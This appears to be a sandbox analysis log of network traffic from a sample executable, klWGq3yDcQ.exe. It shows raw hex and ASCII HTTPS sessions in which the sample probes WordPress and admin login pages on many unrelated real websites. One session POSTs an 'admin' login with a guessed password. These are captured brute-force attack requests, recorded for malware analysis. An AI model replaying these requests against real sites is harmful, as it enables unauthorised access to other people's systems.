                                                                                                                                                                                                    2023-11-26 05:59:44 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 77 70 2d 61 64 6d 69 6e 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:44 GMTServer: Apache/2.4.38 (Debian)Location: http://www.bunasta.eu/wp-admin/Content-Length: 316Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC316INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.bunasta.eu/wp-admin/">here</a>.</p><hr><address>Apache/2.4.38 (De


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    428192.168.2.450264164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC172OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 38 2e 30 2e 32 30 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApacheX-Powered-By: PHP/8.0.20Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC4130INData Raw: 31 30 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72
                                                                                                                                                                                                    Data Ascii: 101a<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; The Godhra City Co-op Bank Ltd. &#8212; WordPress</title><meta name='robots' content='max-image-preview:lar
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2144INData Raw: 38 35 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 30 22 20 69 64 3d 22 7a 78 63 76 62 6e 2d 61 73 79 6e 63 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 69 6e 65 72 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 2e 32 22 20 69 64
                                                                                                                                                                                                    Data Ascii: 859<script type="text/javascript" src="https://gccb.co.in/wp-includes/js/zxcvbn-async.min.js?ver=1.0" id="zxcvbn-async-js"></script><script type="text/javascript" src="https://gccb.co.in/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2" id
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    429192.168.2.45105154.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC250OUTGET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=90qdef5au19fnromgduipcu8s5
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC333INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 78 2d 72 6f 62 6f 74 73 2d 74 61 67 3a 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTServer: Apache/2.4.52 (Ubuntu)x-frame-options: SAMEORIGINx-robots-tag: noindex, nofollowvary: X-Forwarded-Protocol,Accept-Encodingcache-control: no-cache, no-store, must-revalidateConnection:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC7859INData Raw: 32 61 64 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 6f
                                                                                                                                                                                                    Data Ascii: 2ad4<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Lo
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC3111INData Raw: 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 69 66 72 61 6d 65 2d 74 72 61 6e 73 70 6f 72 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 66 69 6c 65 75 70 6c 6f 61 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 61 6c 69 64 61 74 65 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 61 73 70 6e 65 74 63 64 6e 2e 63 6f 6d 2f 61 6a 61 78 2f
                                                                                                                                                                                                    Data Ascii: <script src="/resources/themes/main/js/vendor/jquery.iframe-transport.js"></script> <script src="/resources/themes/main/js/vendor/jquery.fileupload.js"></script> ... Validate --> <script src="//ajax.aspnetcdn.com/ajax/
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    430192.168.2.45110234.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.2brospw.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC653INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 33 2e 33 36 39 31 30 33 35 31 37 32 31 38 38 31 33 34 35 36 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978383.3691035172188134562Cache-Control: public,max-age=0,must-revalidateServer:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC599INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1252INData Raw: 20 2f 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 74 79 6c 65 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6c 61 6e 67 3d 22 65 6e 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 45 72 72 6f 72 50 61 67 65 43 6f 6e 74 72 6f 6c 6c 65 72 20 61 73 20 65 72 72 6f 72 50 61 67 65 43 74 72 6c 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 70 61 67 65 2d 61 70 70 22 20 6e 67 2d 63 6c 61 73 73 3d 22 7b
                                                                                                                                                                                                    Data Ascii: /> ... --> <link rel="stylesheet" href="//static.parastorage.com/services/wix-public/1.719.0/styles/error-pages/styles.css"> ... --></head><body lang="en" ng-controller="ErrorPageController as errorPageCtrl" class="error-page-app" ng-class="{
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1014INData Raw: 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 62 61 73 65 44 6f 6d 61 69 6e 27 2c 20 27 77 69 78 2e 63 6f 6d 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 6c 61 6e 67 75 61 67
                                                                                                                                                                                                    Data Ascii: <script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.719.0/'); angular.module('wixErrorPagesApp').constant('baseDomain', 'wix.com'); angular.module('wixErrorPagesApp').constant('languag


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    431192.168.2.45108066.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC331OUTGET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=Y9iVqDLjjy.4c42u423kB35hFI4xb1W3CLV4ZRxyw.Y-1700978381430-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC227INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 62 66 65 38 33 38 30 64 34 32 31 66 66 61 2d 49 41 44 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSServer: cloudflareCF-RAY: 82bfe8380d421ffa-IAD
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC89INData Raw: 35 33 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: 53<script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    432192.168.2.451100162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC398OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=jj4h1tsj14o7hg5cov2fqll3o0
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://coralparkchristian.org/wp-login.php
                                                                                                                                                                                                    Content-Length: 135
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC135OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 54 30 4a 52 58 34 57 54 53 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=admin&pwd=T0JRX4WTS&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fcoralparkchristian.org%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC522INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 72 2d 63 66 2d 6c 69 73 74 5f 65 6d 61 69 6c 5f 73 65 6e 64 5f 74 6f 3d 64 65 6c 65 74 65 64 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wr-cf-list_email_send_to=deleted;
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC4226INData Raw: 31 30 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e
                                                                                                                                                                                                    Data Ascii: 107a<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Con
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    433192.168.2.45119723.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC165OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
